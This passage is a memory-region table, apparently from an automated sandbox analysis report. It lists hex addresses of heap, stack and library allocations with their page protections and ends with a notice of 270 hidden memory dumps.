page read and write
|
||
|
1B7B1C74000
|
heap
|
page read and write
|
||
|
17A9A4B5000
|
trusted library allocation
|
page read and write
|
||
|
1B7CBFA3000
|
heap
|
page read and write
|
||
|
7FFA9FBDB000
|
trusted library allocation
|
page read and write
|
||
|
58487C000
|
stack
|
page read and write
|
||
|
17A9A79B000
|
trusted library allocation
|
page read and write
|
||
|
7FFA9FEC0000
|
trusted library allocation
|
page read and write
|
||
|
1B7CBCC3000
|
heap
|
page read and write
|
||
|
7FFB0B626000
|
unkown
|
page readonly
|
||
|
17A96EB0000
|
heap
|
page read and write
|
||
|
17AB11D0000
|
heap
|
page read and write
|
||
|
7DF423070000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B7CBFD0000
|
heap
|
page read and write
|
||
|
17A98E60000
|
heap
|
page execute and read and write
|
||
|
54C9DFD000
|
stack
|
page read and write
|
||
|
15366AA0000
|
heap
|
page read and write
|
||
|
7FFA9FE10000
|
trusted library allocation
|
page read and write
|
||
|
54CA33E000
|
stack
|
page read and write
|
||
|
1B7CBD17000
|
heap
|
page read and write
|
||
|
7FFA9FDE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFA9FDF0000
|
trusted library allocation
|
page read and write
|
||
|
7FFA9FF10000
|
trusted library allocation
|
page read and write
|
||
|
7FFA9FEF0000
|
trusted library allocation
|
page read and write
|
||
|
1B7B3A10000
|
trusted library allocation
|
page read and write
|
||
|
7790CF8000
|
stack
|
page read and write
|
||
|
7FFA9FE00000
|
trusted library allocation
|
page read and write
|
||
|
7790EB8000
|
stack
|
page read and write
|
||
|
7FFA9FDA2000
|
trusted library allocation
|
page read and write
|
||
|
17AB11C0000
|
heap
|
page read and write
|
||
|
7FFA9FC7C000
|
trusted library allocation
|
page execute and read and write
|
||
|
17A98D30000
|
heap
|
page execute and read and write
|
||
|
7FFA9FED0000
|
trusted library allocation
|
page read and write
|
||
|
1B7B1C70000
|
heap
|
page read and write
|
||
|
7FFA9FDB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFA9FE40000
|
trusted library allocation
|
page read and write
|
||
|
153684E4000
|
heap
|
page read and write
|
||
|
17A96F3A000
|
heap
|
page read and write
|
||
|
77907DF000
|
stack
|
page read and write
|
||
|
54CA3BB000
|
stack
|
page read and write
|
||
|
7FFA9FE50000
|
trusted library allocation
|
page read and write
|
||
|
7FFA9FE60000
|
trusted library allocation
|
page read and write
|
||
|
1B7B39D0000
|
heap
|
page readonly
|
||
|
17A96F37000
|
heap
|
page read and write
|
||
|
7FFA9FC76000
|
trusted library allocation
|
page read and write
|
There are 270 hidden memdumps, click here to show them.